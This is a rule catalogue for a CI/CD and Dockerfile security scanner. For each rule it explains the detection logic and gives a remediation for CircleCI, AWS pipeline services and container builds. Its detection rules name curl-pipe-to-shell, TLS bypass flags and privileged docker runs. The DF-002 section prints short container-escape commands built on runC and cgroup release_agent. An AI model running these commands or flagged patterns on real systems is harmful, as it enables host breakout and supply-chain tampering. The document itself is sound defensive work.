CC-007: SBOM not produced (no CycloneDX/syft/Trivy-SBOM step) MEDIUM
Evidences: CM-8 System Component Inventory, SR-4 Provenance.
How this is detected. Without an SBOM, downstream consumers cannot audit the exact set of dependencies shipped in the artifact, delaying vulnerability response when a transitive dep is disclosed. The check recognises CycloneDX, syft, Anchore SBOM action, spdx-sbom-generator, Microsoft sbom-tool, and Trivy in SBOM mode.
Recommendation. Add an SBOM generation step: syft . -o cyclonedx-json, Trivy with --format cyclonedx, or Microsoft's sbom-tool. Attach the SBOM to the build artifacts so consumers can ingest it into their vulnerability management pipeline.
Source: CC-007 in the CircleCI provider.
CC-008: Credential-shaped literal in config body CRITICAL 🔧 fix
Evidences: IA-5 Authenticator Management.
How this is detected. Every string in the config is scanned against a set of credential patterns (AWS access keys, GitHub tokens, Slack tokens, JWTs, Stripe, Google, Anthropic, etc.). A match means a secret was pasted into YAML; the value is visible in every fork and every build log and must be treated as compromised.
Recommendation. Rotate the exposed credential immediately. Move the value to a CircleCI project environment variable or a context and reference it via the variable name. For cloud access, prefer OIDC federation over long-lived keys.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example AKIAIOSFODNN7EXAMPLE is deliberately NOT suppressed; if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.
Source: CC-008 in the CircleCI provider.
CC-009: Deploy job missing manual approval gate MEDIUM
Evidences: SA-10 Developer Configuration Management, SA-15 Development Process, Standards, and Tools.
How this is detected. In CircleCI, manual approval is implemented by adding a job with type: approval to the workflow and making the deploy job require it. Without this gate, any push to the triggering branch deploys immediately with no human review.
Recommendation. Add a type: approval job that precedes the deploy job in the workflow, and list it in the deploy job's requires:. This ensures a human must click Approve in the CircleCI UI before production changes roll out.
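A minimal workflow with the gate in place (job names hypothetical):

```yaml
workflows:
  release:
    jobs:
      - build
      - hold:
          type: approval       # pipeline pauses until a human approves in the UI
          requires: [build]
      - deploy:
          requires: [hold]
          filters:
            branches:
              only: main       # also satisfies CC-013
```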
Source: CC-009 in the CircleCI provider.
CC-010: Self-hosted runner without ephemeral marker MEDIUM
Evidences: CM-6 Configuration Settings, CM-7 Least Functionality.
How this is detected. Self-hosted runners that persist between jobs leak filesystem and process state. A PR-triggered job writes to /tmp; a subsequent prod-deploy job on the same runner reads it. The check looks for resource_class values containing 'self-hosted'; if found, it checks for 'ephemeral' in the value. Also checks for machine: true combined with a self-hosted resource class.
Recommendation. Configure self-hosted runners to tear down between jobs. Use a resource_class value that includes an ephemeral marker, or use CircleCI's machine executor with runner auto-scaling so each job gets a fresh environment.
Source: CC-010 in the CircleCI provider.
CC-011: No store_test_results step (test results not archived) LOW
Evidences: AU-2 Event Logging, AU-12 Audit Record Generation.
How this is detected. Without store_test_results, test output is only available in the raw build log. Archiving test results enables CircleCI's test insights, timing-based splitting, and provides an audit trail that links each build to its test outcomes.
Recommendation. Add a store_test_results step to jobs that run tests. This archives test results in CircleCI for traceability, trend analysis, and debugging flaky tests.
Source: CC-011 in the CircleCI provider.
CC-012: Dynamic config via setup: true enables code injection MEDIUM
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation, SA-15 Development Process, Standards, and Tools.
How this is detected. When setup: true is set at the top level, the config becomes a setup workflow. It generates the real pipeline config dynamically (typically via the circleci/continuation orb). An attacker who controls the setup job (e.g. via a malicious PR in a fork) can inject arbitrary config for all subsequent jobs, including deploy steps with production secrets.
Recommendation. If setup: true is required, restrict the setup job to a trusted branch filter and audit the generated config carefully. Ensure the continuation orb's configuration_path points to a checked-in file, not a dynamically generated one that could be influenced by PR content.
Source: CC-012 in the CircleCI provider.
CC-013: Deploy job in workflow has no branch filter MEDIUM
Evidences: SA-10 Developer Configuration Management.
How this is detected. Without branch filters, a deploy job triggers on every branch push, including feature branches and forks. Restricting sensitive jobs to specific branches limits the blast radius of a compromised commit.
Recommendation. Add filters.branches.only to deploy-like workflow jobs so they only run on protected branches (e.g. main, release/*).
Source: CC-013 in the CircleCI provider.
CC-014: Job missing resource_class declaration MEDIUM
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. Without an explicit resource_class, CircleCI assigns a default executor. Declaring the class documents the expected scope and prevents accidental use of larger (or self-hosted) executors that may have elevated privileges.
Recommendation. Add resource_class: to every job to explicitly control the executor size and capabilities. Use the smallest class that satisfies build requirements.
Source: CC-014 in the CircleCI provider.
CC-015: No no_output_timeout configured MEDIUM 🔧 fix
Evidences: CM-6 Configuration Settings.
How this is detected. Without no_output_timeout, a hung step can consume executor time indefinitely. Explicit timeouts cap cost and the window during which a compromised step has access to secrets and the build environment.
Recommendation. Add no_output_timeout: to long-running run steps, or set it at the job level. A reasonable value is 10-30 minutes; setting it explicitly documents the expected bound instead of relying on CircleCI's implicit 10-minute default.
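A sketch of the per-step form (job and step names hypothetical):

```yaml
jobs:
  test:
    docker:
      - image: cimg/node:18.17   # pin by digest per CC-003
    steps:
      - run:
          name: integration tests
          command: ./run-tests.sh
          no_output_timeout: 15m  # kill the step after 15 silent minutes
```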
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-015 in the CircleCI provider.
CC-016: Remote script piped to shell interpreter HIGH 🔧 fix
Evidences: SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a CircleCI config. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the CI runner.
Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.
Source: CC-016 in the CircleCI provider.
CC-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix
Evidences: CM-6 Configuration Settings, CM-7 Least Functionality.
How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a CircleCI config give the container full access to the runner, enabling container escape and lateral movement.
Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-017 in the CircleCI provider.
CC-018: Package install from insecure source HIGH 🔧 fix
Evidences: SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Detects package-manager invocations that use plain HTTP registries (--index-url http://, --registry=http://) or disable TLS verification (--trusted-host, --no-verify) in a CircleCI config. These patterns allow man-in-the-middle injection of malicious packages.
Recommendation. Use HTTPS registry URLs. Remove --trusted-host and --no-verify flags. Pin to a private registry with TLS.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-018 in the CircleCI provider.
CC-019: add_ssh_keys without fingerprint restriction HIGH
Evidences: IA-5 Authenticator Management.
How this is detected. A bare - add_ssh_keys step (without fingerprints:) loads every SSH key configured on the project into the job. This violates least privilege: the job gains access to keys it does not need, increasing the blast radius if the job is compromised.
Recommendation. Always specify fingerprints: when using add_ssh_keys to restrict which SSH keys are loaded into the job. A bare add_ssh_keys step loads ALL project SSH keys.
Source: CC-019 in the CircleCI provider.
CC-020: No vulnerability scanning step MEDIUM
Evidences: RA-5 Vulnerability Monitoring and Scanning, SI-2 Flaw Remediation.
How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.
Recommendation. Add a vulnerability scanning step: trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.
Source: CC-020 in the CircleCI provider.
CC-021: Package install without lockfile enforcement MEDIUM 🔧 fix
Evidences: SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Detects package-manager install commands that do not enforce a lockfile or hash verification. Without lockfile enforcement the resolver pulls whatever version is currently latest, exactly the window a supply-chain attacker exploits.
Recommendation. Use lockfile-enforcing install commands: npm ci instead of npm install, pip install --require-hashes -r requirements.txt, yarn install --frozen-lockfile, bundle install --frozen, and go install tool@v1.2.3.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-021 in the CircleCI provider.
CC-022: Dependency update command bypasses lockfile pins MEDIUM 🔧 fix
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes.
How this is detected. Detects pip install --upgrade, npm update, yarn upgrade, bundle update, cargo update, go get -u, and composer update. These commands bypass lockfile pins and pull whatever version is currently latest. Tooling upgrades (pip install --upgrade pip) are exempted.
Recommendation. Remove dependency-update commands from CI. Use lockfile-pinned install commands (npm ci, pip install -r requirements.txt) and update dependencies via a dedicated PR workflow (e.g. Dependabot, Renovate).
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Common build-tool bootstrapping idioms (pip install --upgrade pip, pip install --upgrade setuptools wheel virtualenv) and security-tool installs (pip install --upgrade pip-audit / cyclonedx-bom / semgrep) are exempted by the DEP_UPDATE_RE tooling allowlist. Other tooling-upgrade idioms not yet on the list can still trip the rule. Defaults to MEDIUM confidence so CI gates can require --min-confidence HIGH to ignore.
Source: CC-022 in the CircleCI provider.
CC-023: TLS / certificate verification bypass HIGH 🔧 fix
Evidences: SC-8 Transmission Confidentiality and Integrity.
How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.
Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-023 in the CircleCI provider.
CCM-001: CodeCommit repository has no approval rule template attached HIGH
Evidences: AC-3 Access Enforcement, SA-10 Developer Configuration Management.
How this is detected. Approval-rule templates are CodeCommit's analog of GitHub's branch-protection require-review. Without one associated, the repository accepts merges from any push-permitted principal, including the PR author themselves, without any second-pair-of-eyes gate.
Recommendation. Create a CodeCommit approval-rule template requiring at least one approval from a designated pool of reviewers and associate it with every repository. Without one, any PR author with push rights can self-approve and merge.
Source: CCM-001 in the AWS provider.
CCM-002: CodeCommit repository not encrypted with customer KMS CMK MEDIUM
Evidences: SC-12 Cryptographic Key Establishment and Management, SC-28 Protection of Information at Rest.
How this is detected. Same shape as CA-001 / ECR-005 / S3 default encryption: the AWS-owned default key keeps the key policy under AWS, removing your ability to scope or audit Decrypt operations. Source code in the repo deserves the same key-policy + CloudTrail story you'd apply to artifacts in S3.
Recommendation. Recreate the repository with a kmsKeyId argument pointing at a customer-managed KMS key. CodeCommit encryption is set at creation and cannot be changed afterwards.
Source: CCM-002 in the AWS provider.
CCM-003: CodeCommit trigger targets SNS/Lambda in a different account MEDIUM
Evidences: AC-3 Access Enforcement, SC-7 Boundary Protection.
How this is detected. A repo trigger pointing at an SNS topic or Lambda in a different account fires under the receiving account's permissions on every push. Sometimes this is the intended shape (a centralized notifications account), but a cross-account fan-out from a compromised repo can drive actions in the receiving account that the source-account owner can't directly observe.
Recommendation. Move trigger targets into the same account as the repository or explicitly document the cross-account relationship. Cross-account triggers extend the blast radius of a repository compromise to whatever the target ARN can do.
Source: CCM-003 in the AWS provider.
CD-001: Automatic rollback on failure not enabled MEDIUM
Evidences: SA-10 Developer Configuration Management.
How this is detected. Without autoRollbackConfiguration, a CodeDeploy deployment that fails leaves the failed revision live until an operator notices. The default is opt-in, not opt-out: deployments fail open, not fail back.
Recommendation. Enable autoRollbackConfiguration with at least the DEPLOYMENT_FAILURE event so CodeDeploy automatically reverts to the last successful revision when a deployment fails.
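A CloudFormation-style sketch of the deployment-group property (event list per the recommendation above):

```yaml
AutoRollbackConfiguration:
  Enabled: true
  Events:
    - DEPLOYMENT_FAILURE
    - DEPLOYMENT_STOP_ON_ALARM   # pairs with the alarms CD-003 asks for
```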
Source: CD-001 in the AWS provider.
CD-002: AllAtOnce deployment config, no canary or rolling strategy HIGH
Evidences: SA-10 Developer Configuration Management.
How this is detected. AllAtOnce shifts 100% of traffic to the new revision in one step. There's no gradient to halt on: if a CloudWatch alarm trips mid-rollout, the bad revision is already serving every request. Canary / linear configs introduce the shift-then-watch shape that lets monitors catch a regression before it's universal.
Recommendation. Switch to a canary or linear deployment configuration (e.g. CodeDeployDefault.LambdaCanary10Percent5Minutes or a custom rolling config) so that defects are caught before they affect all instances or traffic.
Source: CD-002 in the AWS provider.
CD-003: No CloudWatch alarm monitoring on deployment group MEDIUM
Evidences: AU-2 Event Logging, AU-12 Audit Record Generation.
How this is detected. Alarm-based rollback is what lets a canary configuration actually stop a bad deploy mid-flight. Without alarms wired into alarmConfiguration, CodeDeploy's only signal that the deploy went wrong is the deployment-state machine itself, which doesn't notice an application-level regression. CD-002's canary work and this rule's alarm-based halt are paired.
Recommendation. Add CloudWatch alarms (e.g. error rate, 5xx count, latency p99) to the deployment group's alarmConfiguration. Enable automatic rollback on DEPLOYMENT_STOP_ON_ALARM to halt bad deployments.
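A sketch wiring the alarm and the rollback trigger together, assuming an alarm named my-app-5xx already exists:
```bash
aws deploy update-deployment-group \
  --application-name my-app \
  --current-deployment-group-name my-dg \
  --alarm-configuration '{"enabled": true, "alarms": [{"name": "my-app-5xx"}]}' \
  --auto-rollback-configuration '{"enabled": true, "events": ["DEPLOYMENT_FAILURE", "DEPLOYMENT_STOP_ON_ALARM"]}'
```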
Source: CD-003 in the AWS provider.
CP-001: No approval action before deploy stages HIGH
Evidences: SA-10 Developer Configuration Management, SA-15 Development Process, Standards, and Tools.
How this is detected. A pipeline that goes Source -> Build -> Deploy with no Approval action means every commit on the source branch ships, with no human ack between code-merged and code-running-in-prod. The Manual approval action is the intentional pause point; combine with CP-005 for production-tagged stages specifically.
Recommendation. Add a Manual approval action to a stage that precedes every Deploy stage that targets a production or sensitive environment.
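One shape the gate can take in the pipeline definition; stage, action, and topic names are placeholders:
```json
{
  "name": "ApproveProd",
  "actions": [
    {
      "name": "ManualApproval",
      "actionTypeId": { "category": "Approval", "owner": "AWS", "provider": "Manual", "version": "1" },
      "configuration": { "NotificationArn": "arn:aws:sns:us-east-1:123456789012:deploy-approvals" }
    }
  ]
}
```
Insert the stage ahead of the Deploy stage in the pipeline's stages array.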
Source: CP-001 in the AWS provider.
CP-002: Artifact store not encrypted with customer-managed KMS key MEDIUM
Evidences: SC-12 Cryptographic Key Establishment and Management, SC-13 Cryptographic Protection, SC-28 Protection of Information at Rest, SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. The pipeline's S3 artifact store holds intermediate build outputs handed between stages. Default SSE-S3 (AES256) encrypts at rest but uses an AWS-owned key whose policy you can't scope. A customer-managed CMK gives the same key-policy + CloudTrail Decrypt-event audit story you'd apply to Lambda code, Secrets Manager, or any other build output.
Recommendation. Configure a customer-managed AWS KMS key as the encryptionKey for each artifact store. This enables key rotation, fine-grained access policies, and CloudTrail auditing of decrypt operations.
Source: CP-002 in the AWS provider.
CP-003: Source stage using polling instead of event-driven trigger LOW
Evidences: CM-6 Configuration Settings.
How this is detected. PollForSourceChanges=true polls the source repo every minute or two. Beyond the API-quota and latency cost, polling produces a less-useful CloudTrail story than event-driven triggers. You see the poll calls, not the specific commit that started the pipeline. EventBridge / CodeCommit triggers tie each pipeline start to the originating event.
Recommendation. Set PollForSourceChanges=false and configure an Amazon EventBridge rule or CodeCommit trigger to start the pipeline on change. This reduces latency and API usage, and improves auditability.
Known false positives.
- PollForSourceChanges=true is the CFN default for CodeCommit sources, so legacy templates can carry the flag without an active design decision behind it. The rule is advisory (consider EventBridge / CodeStarSourceConnection) rather than a real-risk finding; it defaults to LOW confidence so CI gates filter it out by default.
Source: CP-003 in the AWS provider.
CP-004: Legacy ThirdParty/GitHub source action (OAuth token) HIGH
Evidences: IA-5 Authenticator Management.
How this is detected. The legacy ThirdParty/GitHub source-action provider stores a long-lived OAuth token in the pipeline's action configuration. The token has whatever scope the granting GitHub user has, never rotates, and isn't directly revocable from the AWS side. CodeConnections (formerly CodeStar Connections) replaces this with an AWS-managed connection that the GitHub user can revoke.
Recommendation. Migrate to owner=AWS, provider=CodeStarSourceConnection and reference a CodeConnections connection ARN.
Source: CP-004 in the AWS provider.
CT-001: No active CloudTrail trail in region HIGH
Evidences: AU-2 Event Logging, AU-9 Protection of Audit Information, AU-12 Audit Record Generation.
How this is detected. CloudTrail is the only AWS-native source of record for management-plane API calls. A region with no active trail blinds incident responders: a pipeline compromise is invisible once the in-memory CloudWatch buffer rolls over.
Recommendation. Create a CloudTrail trail that logs management events in this region and start logging. Without a trail, CodeBuild/CodePipeline/IAM API activity, including credential changes during a compromise, has no durable audit record.
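A minimal sketch, assuming the target bucket already carries the CloudTrail bucket policy; the extra flags also pre-empt the sibling CT-002 and CT-003 findings:
```bash
aws cloudtrail create-trail \
  --name mgmt-events \
  --s3-bucket-name my-trail-bucket \
  --is-multi-region-trail \
  --enable-log-file-validation

aws cloudtrail start-logging --name mgmt-events
```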
Source: CT-001 in the AWS provider.
CT-002: CloudTrail log-file validation disabled MEDIUM
Evidences: AU-9 Protection of Audit Information, SI-7 Software, Firmware, and Information Integrity.
How this is detected. CloudTrail logs are S3 objects. Without log-file validation, an attacker with s3:PutObject on the trail bucket can edit log files to remove evidence of their activity, and there's no digest to compare against. With validation on, every hour of logs is summarized in a signed digest file under CloudTrail-Digest/.
Recommendation. Set LogFileValidationEnabled=true on every CloudTrail trail. Log validation produces a signed digest file alongside each log object so tampering by an attacker who also has S3 write access can be detected after the fact.
Source: CT-002 in the AWS provider.
CT-003: CloudTrail trail is not multi-region MEDIUM
Evidences: AU-2 Event Logging, AU-12 Audit Record Generation.
How this is detected. An attacker who knows your CloudTrail trail is regional deliberately operates from a different region. Multi-region trails capture management events from every region into a single trail, closing the gap without you having to enumerate which regions you actually use.
Recommendation. Convert the trail to a multi-region trail. A single-region trail misses activity in every other region; an attacker aware of the scope can drive reconnaissance or persistence from an unlogged region.
Source: CT-003 in the AWS provider.
CW-001: No CloudWatch alarm on CodeBuild FailedBuilds metric LOW
Evidences: AU-2 Event Logging, SI-2 Flaw Remediation.
How this is detected. Failure-rate signals are how on-call learns about an unfamiliar build crashing in a loop, an attacker probing the build environment, or a CI quota being exhausted. CloudWatch captures the FailedBuilds metric automatically; the alarm is the missing fan-out.
Recommendation. Create a CloudWatch alarm on the AWS/CodeBuild namespace FailedBuilds metric (aggregated or per-project). Without one, repeated build failures during a compromise, or a runaway fork-PR build, won't reach on-call.
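A sketch of an account-wide alarm, assuming an existing on-call SNS topic (the ARN is a placeholder):
```bash
aws cloudwatch put-metric-alarm \
  --alarm-name codebuild-failed-builds \
  --namespace AWS/CodeBuild \
  --metric-name FailedBuilds \
  --statistic Sum \
  --period 300 \
  --evaluation-periods 1 \
  --threshold 1 \
  --comparison-operator GreaterThanOrEqualToThreshold \
  --treat-missing-data notBreaching \
  --alarm-actions arn:aws:sns:us-east-1:123456789012:oncall
```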
Source: CW-001 in the AWS provider.
CWL-001: CodeBuild log group has no retention policy LOW
Evidences: AU-2 Event Logging, AU-11 Audit Record Retention.
How this is detected. CloudWatch Logs created by CodeBuild default to Never Expire retention. Build logs frequently echo secrets accidentally (a set -x script, an env dump in an error trace), so unbounded retention extends the exposure window for every secret a build has ever leaked. A short-but-finite retention also caps cost.
Recommendation. Set a retention policy on every /aws/codebuild/* log group. The default is 'Never Expire', which both racks up storage cost and keeps logs indefinitely past any compliance window.
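For example, a 90-day window (the number is a policy choice, not a scanner mandate):
```bash
aws logs put-retention-policy \
  --log-group-name /aws/codebuild/my-project \
  --retention-in-days 90
```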
Source: CWL-001 in the AWS provider.
CWL-002: CodeBuild log group not KMS-encrypted MEDIUM
Evidences: AU-9 Protection of Audit Information, SC-12 Cryptographic Key Establishment and Management, SC-28 Protection of Information at Rest.
How this is detected. CloudWatch Logs default encryption is service-managed: fine for confidentiality, but with no audit trail or key-policy scoping. Build logs are a frequent secret-leak vector (CWL-001's rationale extended), so the same key-policy + Decrypt-event story you'd apply to S3 / Lambda / Secrets Manager is warranted here too.
Recommendation. Associate a customer-managed KMS key with every /aws/codebuild/* log group via associate-kms-key. Logs often contain secret material accidentally echoed by builds; encrypting them with a CMK means the key policy controls who can read the logs, not just S3/CloudWatch IAM.
Source: CWL-002 in the AWS provider.
DF-001: FROM image not pinned to sha256 digest HIGH 🔧 fix
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Reuses _primitives/image_pinning.classify so the floating-tag semantics match GL-001 / JF-009 / ADO-009 / CC-003. PINNED_TAG (e.g. python:3.12.1-slim) is treated as unpinned here too; only an explicit @sha256: survives, since the tag is mutable on the registry side.
Recommendation. Resolve every base image to its current digest (docker buildx imagetools inspect <ref> prints it) and pin via FROM repo@sha256:<digest>. Automate refreshes with Renovate or Dependabot. A floating tag (:latest, :3, no tag) silently swaps the build base under every rebuild.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- Docker Hub typosquatting / namespace-takeover incidents (2017 onward): Sysdig and Aqua research documented thousands of malicious images uploaded under near-miss names (docker-library lookalikes, alpine vs alphine, etc.) and occasional namespace recoveries shipping crypto-miners downstream. Digest-pinned consumers are immune; tag-pinned consumers pull whatever sits under the name today.
- Codecov codecov/codecov-action tag-mutation incident (post-Codecov-Bash-uploader compromise): the upstream rotated the action's @v3 tag during the fallout, and consumers pinning to the tag silently re-ran a different build than before. Digest pinning would have surfaced the change as a checksum mismatch instead of a silent swap.
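A sketch of the pinned form; the digest below is a placeholder, substitute the value the inspect command prints:
```dockerfile
# Resolved via: docker buildx imagetools inspect python:3.12.1-slim
# (placeholder digest; substitute the real value)
FROM python:3.12.1-slim@sha256:0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
```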
Source: DF-001 in the Dockerfile provider.
DF-002: Container runs as root (missing or root USER directive) HIGH 🔧 fix
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. Multi-stage builds: only the final stage matters for runtime identity, since intermediate stages don't ship. The check scopes USER to the last FROM through end-of-file.
Recommendation. Add a USER <non-root> directive after package install steps (e.g. USER 1001 or USER appuser). Running as root inside a container is not isolation: a kernel CVE, a misconfigured mount, or a mis-applied capability collapses straight into the host.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- CVE-2019-5736 (runC host breakout): a malicious container running as root could overwrite the host's runC binary and compromise every other container on the node. Non-root containers were not exploitable.
- CVE-2022-0492 (cgroups v1 escape via release_agent): root inside a container with CAP_SYS_ADMIN could write to the host's release_agent file and execute arbitrary host code. Containers running as a non-root UID side-stepped the exploit class entirely.
Proof of exploit.
Vulnerable: image runs as root by default (no USER set).
```dockerfile
FROM ubuntu:22.04
RUN apt-get update && apt-get install -y python3
COPY app.py /app/
CMD ["python3", "/app/app.py"]
```
Attack: when the container is breached (RCE in the app, a kernel CVE, a misconfigured mount), the attacker runs as UID 0. From there:
```bash
# CVE-2019-5736 path: overwrite /proc/self/exe to corrupt the host's
# runC binary; the next container launch on the node executes
# attacker code on the host:
echo '#!/bin/sh\n/attacker_payload' > /proc/self/exe

# CVE-2022-0492 path: cgroup release_agent escape:
mkdir /tmp/cg && mount -t cgroup -o memory cgroup /tmp/cg
echo '/payload' > /tmp/cg/release_agent
echo 1 > /tmp/cg/notify_on_release
```
A non-root UID makes both paths fail at the first syscall.
Safe: drop to a dedicated unprivileged user.
```dockerfile
FROM ubuntu:22.04
RUN apt-get update && apt-get install -y python3 \
 && useradd --uid 1001 --create-home app
COPY --chown=app:app app.py /app/
USER 1001
CMD ["python3", "/app/app.py"]
```
Source: DF-002 in the Dockerfile provider.
DF-003: ADD pulls remote URL without integrity verification HIGH
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. ADD with a URL is the historical Dockerfile footgun: it fetches at build time over HTTP(S) with no checksum and no signature, and the registry tag does not pin the source. A tampered server or DNS hijack silently swaps the content. COPY is for local files; RUN curl + verify is for remote ones.
Recommendation. Replace ADD https://... with a multi-step RUN: download the file with curl -fsSLo, verify a known-good checksum (sha256sum -c) or signature (cosign verify-blob), then extract / install. Better still: download the artifact in a builder stage and COPY it across. That way the verifier runs once at build time, not per-pull.
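A sketch of the builder-stage pattern; the URL, checksum, and paths are placeholders:
```dockerfile
FROM alpine:3.19 AS fetch
RUN apk add --no-cache curl \
 && curl -fsSLo /tmp/tool.tar.gz https://example.com/tool.tar.gz \
 && echo '<expected-sha256>  /tmp/tool.tar.gz' | sha256sum -c - \
 && mkdir -p /opt/tool && tar -xzf /tmp/tool.tar.gz -C /opt/tool

FROM ubuntu:22.04
# Only the verified artifact crosses into the runtime image:
COPY --from=fetch /opt/tool/tool /usr/local/bin/tool
```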
Source: DF-003 in the Dockerfile provider.
DF-004: RUN executes a remote script via curl-pipe / wget-pipe HIGH
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Reuses _primitives/remote_script_exec.scan so the vocabulary matches the equivalent CI-side rules (GHA-016, GL-016, BB-012, ADO-016, CC-016, JF-016).
Recommendation. Download to a file, verify checksum or signature, then execute. curl -fsSL <url> -o /tmp/x.sh && sha256sum -c <(echo '<digest> /tmp/x.sh') && bash /tmp/x.sh. Vendor installers from well-known hosts (rustup.rs, get.docker.com, ...) are reported with vendor_trusted=true so reviewers can calibrate.
Source: DF-004 in the Dockerfile provider.
DF-005: RUN uses shell-eval (eval / sh -c on a variable / backticks) HIGH
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation.
How this is detected. Reuses _primitives/shell_eval.scan, same primitive used by GHA-028 / GL-026 / BB-026 / ADO-027 / CC-027 / JF-030 so the safe / unsafe vocabulary matches across the tool.
Recommendation. Replace eval "$X" and sh -c "$X" with explicit argv invocations. If the build genuinely needs a templated command, render it through a sealed config file or use RUN --mount=type=secret with explicit input. $( … ) / backticks should never wrap interpolated user-controlled vars inside a Dockerfile.
Source: DF-005 in the Dockerfile provider.
DF-006: ENV or ARG carries a credential-shaped literal value CRITICAL
Evidences: IA-5 Authenticator Management.
How this is detected. Reuses _primitives/secret_shapes, flags AKIA-prefixed AWS keys outright (the literal AWS access-key shape) and credential-named keys (API_KEY, DB_PASSWORD, SECRET_TOKEN) when the value is a non-empty literal.
Recommendation. Never hard-code credentials in a Dockerfile. ENV values are baked into the image layer history; even if the value is later overwritten, docker history --no-trunc reads the original. Use RUN --mount=type=secret for build-time secrets or runtime env injection (docker run -e SECRET=…) for runtime ones. Rotate any secret already exposed.
Source: DF-006 in the Dockerfile provider.
DF-007: No HEALTHCHECK directive declared LOW 🔧 fix
Evidences: AU-2 Event Logging, SI-2 Flaw Remediation.
How this is detected. This is a defense-in-depth signal rather than an exploitation indicator, severity is LOW. A missing healthcheck doesn't create a vulnerability on its own, but downstream orchestrators (Kubernetes, ECS, Compose) cannot recover an unhealthy container they cannot detect, and that turns a soft failure (slow leak, deadlock) into a stale-process incident.
Recommendation. Declare a HEALTHCHECK so the orchestrator can detect stuck or zombie containers. Example: HEALTHCHECK --interval=30s --timeout=5s --retries=3 CMD curl -fsS http://localhost/healthz || exit 1. Skip this for builder/multi-stage intermediate images, only the runtime image needs one.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: DF-007 in the Dockerfile provider.
DF-008: RUN invokes docker --privileged or escalates capabilities HIGH
Evidences: AC-6 Least Privilege, CM-7 Least Functionality.
How this is detected. Mirrors GHA-017 / GL-017 / BB-013 / ADO-017 / CC-017 / JF-017 (docker run --privileged in CI scripts) but at Dockerfile build time. The risk is subtler: a privileged RUN step doesn't directly elevate the resulting image, but it gives the build host's docker daemon a chance to escape, and any tampered base image can exploit the elevated build.
Recommendation. A Dockerfile build step almost never legitimately needs --privileged or --cap-add SYS_ADMIN / ALL. If the build genuinely requires elevated capabilities (e.g. compiling a kernel module), do it in a sealed builder image and COPY the artifact out, don't carry the privileged execution into the runtime image.
Source: DF-008 in the Dockerfile provider.
DF-009: ADD used where COPY would suffice LOW
Evidences: CM-6 Configuration Settings.
